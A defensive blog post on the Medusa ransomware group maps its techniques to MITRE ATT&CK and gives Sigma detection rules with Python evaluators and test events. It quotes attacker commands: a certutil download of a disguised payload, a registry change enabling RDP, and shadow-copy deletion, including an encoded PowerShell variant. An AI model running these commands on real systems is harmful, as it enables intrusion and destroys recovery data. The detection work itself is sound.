Welcome to the fourth entry in the Ransomware Group series! Just like before, we’ll start with some quick background information on the threat group and include links to more detailed analysis. Then we’ll dive into some tactics, techniques, and procedures (TTPs) mapped to the MITRE ATT&CK framework — along with basic detection strategies (Sigma rules).
Past entries in this series:
Reminder: It goes without saying that a holistic security program is needed and defense-in-depth strategies should be followed. I’ll be focusing more on detection strategies since these often get overlooked.
What is Medusa?
Medusa is a Ransomware-as-a-Service (RaaS) operation that first emerged in June 2021. Since then it has steadily gained notoriety for high-impact attacks on critical infrastructure and on victims around the world, including an Australian cancer center, a UK high school and Minneapolis Public Schools. Medusa actors typically gain initial access by exploiting vulnerable, publicly exposed services or by using compromised credentials. Once inside, they exfiltrate sensitive data to maximize their leverage and then deploy the ransomware rapidly. This is a double-extortion model: victims are threatened with publication of the stolen data unless they pay the ransom.
Medusa is now treated as an emerging threat, prompting CISA, the FBI and MS-ISAC to publish a joint advisory (AA25-071A) on March 12, 2025 warning organizations about the operation. What makes the group dangerous is that it is opportunistic: no industry is off-limits, including healthcare and critical infrastructure. It also operates a leak site, the "Medusa Blog," where it publicly shames and pressures victims who refuse to pay.
Feel free to check out the advisory for more analysis and IOCs:
MITRE ATT&CK TTPs & Detection Strategies
We’ll walk through some observed techniques used by Medusa and map them to the MITRE ATT&CK framework. Each section includes detection strategies and rule examples. Just a reminder, any new rules should be tested and tuned before getting implemented in a production environment.
If you need a quick primer on Sigma rules/the Sigma project, see my previous post about it here:
A Brief Overview of Sigma
If you've read any of my posts, you've noticed that I'm a big proponent of the Sigma project. Whenever I set out to write detection rules, I do so in this format.
Defense Evasion
Obfuscated Files or Information – T1027
Medusa actors use Living-off-the-Land (LOTL or LOL) techniques to blend in with normal activity and bypass security monitoring, relying on built-in, legitimate Windows utilities to carry out their actions. One example is ‘certutil.exe’ with the ‘urlcache’ parameter to download a payload; note how the remote file is disguised with a .css extension and written to disk as a .dll:
cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll
For more information on certutil.exe and other LOL binaries, see the LOLBAS project here:
https://lolbas-project.github.io
Detection Strategy: Look for the execution of ‘certutil.exe’ with a command line containing ‘urlcache’ (or ‘verifyctl’, which can download files as well) together with ‘http’. Luckily for us, the Sigma project already has a rule for this. Note that it matches on OriginalFileName as well as the image path, so a renamed copy of certutil is still caught:
title: Suspicious Download Via Certutil.EXE
id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b
related:
    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
      type: similar
status: test
description: Detects the execution of certutil with certain flags that allow the utility to download files.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
tags:
    - attack.defense-evasion
    - attack.t1027
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certutil.exe'
        - OriginalFileName: 'CertUtil.exe'
    selection_flags:
        CommandLine|contains:
            - 'urlcache '
            - 'verifyctl '
    selection_http:
        CommandLine|contains: 'http'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
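To see how the selections and the condition of a rule like this combine, here is a small evaluator I added for this post. It is not code from the original article and not part of the Sigma project: it implements only the subset of Sigma matching the rules on this page use and runs the certutil rule's detection block (transcribed as a dict) over a few constructed process-creation events. The events, hostnames and paths are made up. The same evaluate() function also handles the '1 of' and parenthesised conditions used by the two rules later in the post.

```python
"""Minimal evaluator for the Sigma detection logic on this page (added example, not
code from the post or from the Sigma project). It implements only what the three
rules here need: endswith/contains (+all) modifiers, lists of maps as OR, and
conditions built from 'all of X*', '1 of X*', and/or/not and parentheses."""
import fnmatch
import re

# The 'detection' section of "Suspicious Download Via Certutil.EXE", transcribed 1:1.
CERTUTIL_DETECTION = {
    "selection_img": [
        {"Image|endswith": "\\certutil.exe"},
        {"OriginalFileName": "CertUtil.exe"},
    ],
    "selection_flags": {"CommandLine|contains": ["urlcache ", "verifyctl "]},
    "selection_http": {"CommandLine|contains": "http"},
    "condition": "all of selection_*",
}

def _field_matches(event: dict, key: str, expected) -> bool:
    """One 'Field|modifiers: value(s)' entry. Sigma matches case-insensitively,
    so '-URLCACHE' hits 'urlcache ' just as well as the lowercase form."""
    field, *mods = key.split("|")
    actual = str(event.get(field, "")).lower()
    values = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]
    if "endswith" in mods:
        hit = actual.endswith
    elif "contains" in mods:
        hit = lambda v: v in actual  # noqa: E731
    else:
        hit = actual.__eq__
    # A value list is OR by default; the 'all' modifier turns it into AND.
    return all(map(hit, values)) if "all" in mods else any(map(hit, values))

def _selection_matches(event: dict, selection) -> bool:
    """A map is AND over its fields; a list of maps is OR over the maps."""
    if isinstance(selection, list):
        return any(_selection_matches(event, item) for item in selection)
    return all(_field_matches(event, k, v) for k, v in selection.items())

def evaluate(detection: dict, event: dict) -> bool:
    """Evaluate one event against a Sigma 'detection' block: recursive descent
    over the condition string, with 'and' binding tighter than 'or' as in Sigma."""
    results = {name: _selection_matches(event, sel)
               for name, sel in detection.items() if name != "condition"}
    tokens = re.findall(r"\(|\)|[^\s()]+", detection["condition"])
    pos = 0  # cursor into tokens, shared by the nested helpers

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def chain(op: str, operand) -> bool:  # operand (op operand)*
        nonlocal pos
        value = operand()
        while peek() == op:
            pos += 1
            rhs = operand()  # always evaluated: parsing must consume its tokens
            value = (value and rhs) if op == "and" else (value or rhs)
        return value

    def or_expr() -> bool:
        return chain("or", lambda: chain("and", term))

    def term() -> bool:
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "(":
            value = or_expr()
            pos += 1  # consume ')'
            return value
        if tok == "not":
            return not term()
        if peek() == "of":  # 'all of X*', '1 of X*', 'all of them'
            pattern = tokens[pos + 1]
            pos += 2
            names = list(results) if pattern == "them" else fnmatch.filter(results, pattern)
            hits = [results[n] for n in names]
            return all(hits) if tok == "all" else sum(hits) >= int(tok)
        return results[tok]  # a bare selection name

    return or_expr()

def _ev(image: str, cmd: str, orig: str = "CertUtil.exe") -> dict:
    return {"Image": image, "OriginalFileName": orig, "CommandLine": cmd}

# Constructed process_creation events (made up for this example, not real telemetry).
EVENTS = {
    "medusa_style_download": _ev("C:\\Windows\\System32\\certutil.exe",
        "certutil -f urlcache https://cdn.example.com/site.css C:\\ProgramData\\upd.dll"),
    # renamed copy with upper-case flags; the PE OriginalFileName still gives it away
    "renamed_copy_upper_case": _ev("C:\\Users\\Public\\ct.exe",
        "ct.exe -URLCACHE -split -f HTTP://cdn.example.com/a.txt a.txt"),
    "benign_hashfile": _ev("C:\\Windows\\System32\\certutil.exe",
        "certutil -hashfile C:\\Temp\\installer.msi SHA256"),
    # cache maintenance: has 'urlcache' but no 'http', so the rule stays quiet
    "urlcache_without_http": _ev("C:\\Windows\\System32\\certutil.exe", "certutil -urlcache * delete"),
}

def run_rule(detection: dict, events: dict) -> dict:
    """Event name -> whether the rule fired."""
    return {name: evaluate(detection, ev) for name, ev in events.items()}
```

Running run_rule(CERTUTIL_DETECTION, EVENTS) fires on the first two events only. The renamed-copy case is caught purely because selection_img is a list, which Sigma treats as OR, so OriginalFileName from the PE header fills in for the image path. Two limitations worth knowing before you lean on this: real Sigma values may contain the wildcards * and ?, which this evaluator does not expand, and the trailing space in 'urlcache ' means a command line that ends right after -urlcache will not match.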
Lateral Movement
Remote Services: Remote Desktop Protocol – T1021.001
Medusa actors use RDP to move laterally through the network. They have been observed enabling it by setting fDenyTSConnections to 0 in the registry:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Detection Strategy: Look for the execution of ‘reg.exe’ with a command line that targets the Terminal Server registry keys. The existing Sigma rule below is a good starting point and would alert on the command above (it also fires when someone sets fDenyTSConnections back to 1, so expect some noise from administrators). It only sees the reg.exe command line, though, not the registry write itself: the same change made through Registry Editor, PowerShell’s Set-ItemProperty or WMI produces no reg.exe process and goes unnoticed. Consider deploying Sysmon and alerting on registry value-set events (Sysmon Event ID 13, Sigma logsource category registry_set) for fDenyTSConnections as well, since those catch the write regardless of which tool made it:
title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE
id: 0d5675be-bc88-4172-86d3-1e96a4476536
status: test
description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
references:
    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport
date: 2022-02-12
modified: 2023-02-05
tags:
    - attack.defense-evasion
    - attack.lateral-movement
    - attack.t1021.001
    - attack.t1112
logsource:
    product: windows
    category: process_creation
detection:
    selection_main_img:
        - Image|endswith: '\reg.exe'
        - OriginalFileName: 'reg.exe'
    selection_main_cli:
        CommandLine|contains|all:
            - ' add '
            - '\CurrentControlSet\Control\Terminal Server'
            - 'REG_DWORD'
            - ' /f'
    selection_values_1:
        CommandLine|contains|all:
            - 'Licensing Core'
            - 'EnableConcurrentSessions'
    selection_values_2:
        CommandLine|contains:
            - 'WinStations\RDP-Tcp'
            - 'MaxInstanceCount'
            - 'fEnableWinStation'
            - 'TSUserEnabled'
            - 'TSEnabled'
            - 'TSAppCompat'
            - 'IdleWinStationPoolCount'
            - 'TSAdvertise'
            - 'AllowTSConnections'
            - 'fSingleSessionPerUser'
            - 'fDenyTSConnections'
    condition: all of selection_main_* and 1 of selection_values_*
falsepositives:
    - Unknown
level: high
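The Sysmon route mentioned above, as an added example of my own rather than code from the post: a registry_set detection evaluated over constructed Sysmon Event ID 13 (RegistryEvent: Value Set) records. The Sigma draft embedded in the block is mine and untested, not a SigmaHQ rule; the event records, hostnames and usernames are fabricated, with field names following Sysmon's schema. The point it makes is that the write looks identical whether reg.exe, regedit.exe or PowerShell made it, so the process_creation rule's blind spot disappears.

```python
"""Added example (mine, not the post's and not a SigmaHQ rule): detect RDP being
switched on from the registry write itself, using constructed Sysmon Event ID 13
(RegistryEvent: Value Set) records. The process_creation rule above only sees
reg.exe command lines; the value change looks the same whichever tool made it."""

# Draft Sigma rule for the registry_set logsource; the Python below implements it.
SIGMA_DRAFT = r"""
title: RDP Enabled Via Terminal Server Registry Value (draft, untested)
logsource:
    category: registry_set
    product: windows
detection:
    selection_value:
        TargetObject|endswith:
            - '\Control\Terminal Server\fDenyTSConnections'
            - '\Control\Terminal Server\fSingleSessionPerUser'
    selection_data:
        Details: 'DWORD (0x00000000)'
    condition: all of selection_*
level: high
"""

# Value paths as Sysmon renders them in TargetObject, lower-cased for matching.
WATCHED_VALUES = (
    "\\control\\terminal server\\fdenytsconnections",    # 0 = RDP connections allowed
    "\\control\\terminal server\\fsinglesessionperuser",  # 0 = several sessions per user
)
ENABLED = "dword (0x00000000)"  # how Sysmon renders a DWORD 0 in the Details field


def is_rdp_enable_write(event: dict) -> bool:
    """True for a Sysmon EID 13 write that sets one of the watched values to 0."""
    if event.get("EventID") != 13:
        return False
    target = str(event.get("TargetObject", "")).lower()
    details = str(event.get("Details", "")).lower()
    return details == ENABLED and target.endswith(WATCHED_VALUES)


def detect_rdp_enablement(events: list) -> list:
    """One alert per matching write, carrying the fields an analyst pivots on."""
    return [
        {"time": ev["UtcTime"], "host": ev["Computer"], "user": ev["User"],
         "image": ev["Image"], "value": ev["TargetObject"].rsplit("\\", 1)[-1]}
        for ev in events if is_rdp_enable_write(ev)
    ]


# Constructed Sysmon events (fabricated for this example; field names follow Sysmon's schema).
_TS = "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\"
SAMPLE_EVENTS = [
    # 1. the reg.exe command from the post: both rules catch this one
    {"EventID": 13, "UtcTime": "2025-03-12 10:01:02.100", "Computer": "WS01.corp.example",
     "User": "CORP\\svc-backup", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": _TS + "fDenyTSConnections", "Details": "DWORD (0x00000000)"},
    # 2. same change through Registry Editor: no reg.exe command line to match
    {"EventID": 13, "UtcTime": "2025-03-12 10:05:44.210", "Computer": "WS02.corp.example",
     "User": "CORP\\jdoe", "Image": "C:\\Windows\\regedit.exe",
     "TargetObject": _TS + "fDenyTSConnections", "Details": "DWORD (0x00000000)"},
    # 3. PowerShell Set-ItemProperty allowing concurrent sessions
    {"EventID": 13, "UtcTime": "2025-03-12 10:07:13.002", "Computer": "WS02.corp.example",
     "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": _TS + "fSingleSessionPerUser", "Details": "DWORD (0x00000000)"},
    # 4. RDP being turned off (data 1): same value, not an alert
    {"EventID": 13, "UtcTime": "2025-03-12 11:00:00.000", "Computer": "WS01.corp.example",
     "User": "CORP\\admin", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": _TS + "fDenyTSConnections", "Details": "DWORD (0x00000001)"},
    # 5. unrelated value under the same key (listening port 0xd3d = 3389)
    {"EventID": 13, "UtcTime": "2025-03-12 11:02:00.000", "Computer": "WS01.corp.example",
     "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": _TS + "WinStations\\RDP-Tcp\\PortNumber", "Details": "DWORD (0x00000d3d)"},
]

if __name__ == "__main__":
    for a in detect_rdp_enablement(SAMPLE_EVENTS):
        print(f"{a['time']} {a['host']} {a['user']} set {a['value']}=0 via {a['image']}")
```

Three of the five records alert (reg.exe, regedit.exe and powershell.exe); the reg.exe write that disables RDP again does not, because the check is on the new data rather than on the value name alone. Sysmon only emits Event ID 13 for keys your configuration includes, so make sure the Terminal Server key is in the RegistryEvent include list before relying on this.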
Impact
Inhibit System Recovery – T1490
Deleting Volume Shadow Copies to prevent recovery is standard ransomware behavior, and Medusa is no exception. Medusa has been observed doing this with the vssadmin utility:
vssadmin.exe Delete Shadows /all /quiet
Detection Strategy: Look for the execution of ‘vssadmin.exe’ with a command line containing ‘delete’ and ‘shadow’. The existing Sigma rule below goes further: it also covers wmic, PowerShell and diskshadow, wbadmin catalog deletion, and vssadmin resizing shadow storage (another way to force old copies out). Because it matches plain command-line substrings, anything that hides the command, such as an encoded PowerShell payload, has to be decoded before the rule can see it:
title: Shadow Copies Deletion Using Operating Systems Utilities
id: c947b146-0abc-4c87-9c64-b17e9d7274a2
status: stable
description: Shadow Copies deletion using operating systems utilities
references:
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
    - https://blog.talosintelligence.com/2017/05/wannacry.html
    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/
    - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
    - https://github.com/Neo23x0/Raccine#the-process
    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar
    - https://redcanary.com/blog/intelligence-insights-october-2021/
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware
author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
date: 2019-10-22
modified: 2022-11-03
tags:
    - attack.defense-evasion
    - attack.impact
    - attack.t1070
    - attack.t1490
logsource:
    category: process_creation
    product: windows
detection:
    selection1_img:
        - Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\wmic.exe'
            - '\vssadmin.exe'
            - '\diskshadow.exe'
        - OriginalFileName:
            - 'PowerShell.EXE'
            - 'pwsh.dll'
            - 'wmic.exe'
            - 'VSSADMIN.EXE'
            - 'diskshadow.exe'
    selection1_cli:
        CommandLine|contains|all:
            - 'shadow' # will match "delete shadows" and "shadowcopy delete" and "shadowstorage"
            - 'delete'
    selection2_img:
        - Image|endswith: '\wbadmin.exe'
        - OriginalFileName: 'WBADMIN.EXE'
    selection2_cli:
        CommandLine|contains|all:
            - 'delete'
            - 'catalog'
            - 'quiet' # will match -quiet or /quiet
    selection3_img:
        - Image|endswith: '\vssadmin.exe'
        - OriginalFileName: 'VSSADMIN.EXE'
    selection3_cli:
        CommandLine|contains|all:
            - 'resize'
            - 'shadowstorage'
        CommandLine|contains:
            - 'unbounded'
            - '/MaxSize='
    condition: (all of selection1*) or (all of selection2*) or (all of selection3*)
fields:
    - CommandLine
    - ParentCommandLine
falsepositives:
    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
    - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)
level: high
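The encoded-command blind spot, as an added example of my own (not code from the post or from the Sigma project): the block decodes a PowerShell -EncodedCommand argument, appends the decoded script to the command line, and then applies a straight port of the rule's three selections. The events are constructed, including a WMI shadow-copy deletion wrapped in -enc, and the helper that builds the encoded argument is there only so the sample is self-contained.

```python
"""Added example (mine, not from the post or the Sigma project): the rule above keys
on the substrings 'shadow' and 'delete' in CommandLine, so the same action hidden
in a PowerShell -EncodedCommand payload sails past it. Decode first, then match."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """The UTF-16LE script behind -EncodedCommand, or None if there is none."""
    for flag, blob in _ENC_FLAG.findall(cmdline):
        if "encodedcommand".startswith(flag.lower()):  # skips -ep/-ex (ExecutionPolicy)
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def normalize(cmdline: str) -> str:
    """Command line with its decoded payload appended, so substring checks see both."""
    decoded = decode_encoded_command(cmdline)
    return cmdline if decoded is None else f"{cmdline} [decoded: {decoded}]"


_SEL1_IMAGES = ("\\powershell.exe", "\\pwsh.exe", "\\wmic.exe", "\\vssadmin.exe", "\\diskshadow.exe")


def matches_shadow_copy_rule(event: dict, decode: bool = True) -> bool:
    """Port of the rule's three selections, case-insensitive like Sigma."""
    image = event.get("Image", "").lower()
    raw = event.get("CommandLine", "")
    cmd = (normalize(raw) if decode else raw).lower()
    sel1 = image.endswith(_SEL1_IMAGES) and "shadow" in cmd and "delete" in cmd
    sel2 = image.endswith("\\wbadmin.exe") and all(w in cmd for w in ("delete", "catalog", "quiet"))
    sel3 = (image.endswith("\\vssadmin.exe") and "resize" in cmd and "shadowstorage" in cmd
            and ("unbounded" in cmd or "/maxsize=" in cmd))
    return sel1 or sel2 or sel3


def ps_encode(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events (not real telemetry).
SAMPLE_EVENTS = {
    "vssadmin_delete": {"Image": "C:\\Windows\\System32\\vssadmin.exe",
                        "CommandLine": "vssadmin.exe Delete Shadows /all /quiet"},
    "wmic_delete": {"Image": "C:\\Windows\\System32\\wbem\\wmic.exe",
                    "CommandLine": "wmic shadowcopy delete"},
    "encoded_powershell": {  # WMI shadow-copy deletion hidden behind -enc
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
                       + ps_encode("Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }")},
    "wbadmin_catalog": {"Image": "C:\\Windows\\System32\\wbadmin.exe",
                        "CommandLine": "wbadmin delete catalog -quiet"},
    "vssadmin_list": {"Image": "C:\\Windows\\System32\\vssadmin.exe",
                      "CommandLine": "vssadmin list shadows"},
}


def scan(events: dict, decode: bool = True) -> dict:
    """Event name -> whether the rule fires, with or without payload decoding."""
    return {name: matches_shadow_copy_rule(ev, decode) for name, ev in events.items()}


if __name__ == "__main__":
    with_decoding, without = scan(SAMPLE_EVENTS), scan(SAMPLE_EVENTS, decode=False)
    for name in SAMPLE_EVENTS:
        note = " (missed without decoding)" if with_decoding[name] and not without[name] else ""
        print("ALERT" if with_decoding[name] else "ok   ", name + note)
```

With decoding off, the encoded PowerShell event is the one the rule misses; with it on, all four deletion variants fire and the harmless 'vssadmin list shadows' stays quiet. Decoding at ingest is one fix; the other is to not depend on the command line at all and alert on the decoded script from PowerShell Script Block Logging (Event ID 4104), which records what actually ran regardless of how it was passed in.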
Closing Thoughts
Medusa continues the trend of increasingly professionalized RaaS groups targeting critical infrastructure. As defenders, our best chance at disrupting these operations lies in proactive detection engineering, layered defense, and rigorous logging and monitoring.
As always, test detection rules thoroughly and tailor them to your environment. Stay safe out there!